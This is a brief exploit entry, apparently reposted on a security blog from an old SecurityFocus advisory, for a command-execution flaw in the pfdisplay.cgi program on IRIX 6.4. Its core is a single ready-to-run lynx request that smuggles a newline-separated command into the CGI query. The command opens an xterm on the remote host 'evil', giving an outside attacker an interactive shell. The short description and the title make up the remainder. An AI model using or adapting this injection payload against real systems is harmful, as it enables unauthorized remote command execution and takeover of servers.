IRIX 6.4 - 'pfdisplay.cgi' Code Execution Secer's Blog - 记录互联网安全历程与个人成长经历

source: http://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'

IRIX 6.4 - 'pfdisplay.cgi' Code Execution

Hacking more